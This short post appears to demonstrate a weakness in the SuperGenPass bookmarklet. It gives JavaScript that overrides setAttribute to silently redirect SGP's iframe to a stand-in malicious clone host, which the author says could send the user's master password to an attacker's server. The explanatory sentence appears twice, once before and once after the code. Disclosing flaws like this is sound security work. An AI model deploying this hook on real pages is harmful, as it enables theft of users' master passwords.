Here is a code that detects opening of SGP and replaces URL of the created iframe. I could than create a copy of SGP and add a script for sending the master password to my server. User wouldn't notice anything suspicious as they don't see the real iframe's URL.
var originalSetAttribute = Element.prototype.setAttribute
Element.prototype.setAttribute = function (name, value) {
if (value == "https://chriszarate.github.io/supergenpass/mobile/") {
this.onload = () => {
this.setAttribute("src", "https://www.malicious-clone-of-sgp.com/supergenpass/mobile/")
this.onload = null
}
}
originalSetAttribute.call(this, name, value)
}
Here is a code that detects opening of SGP and replaces URL of the created iframe. I could than create a copy of SGP and add a script for sending the master password to my server. User wouldn't notice anything suspicious as they don't see the real iframe's URL.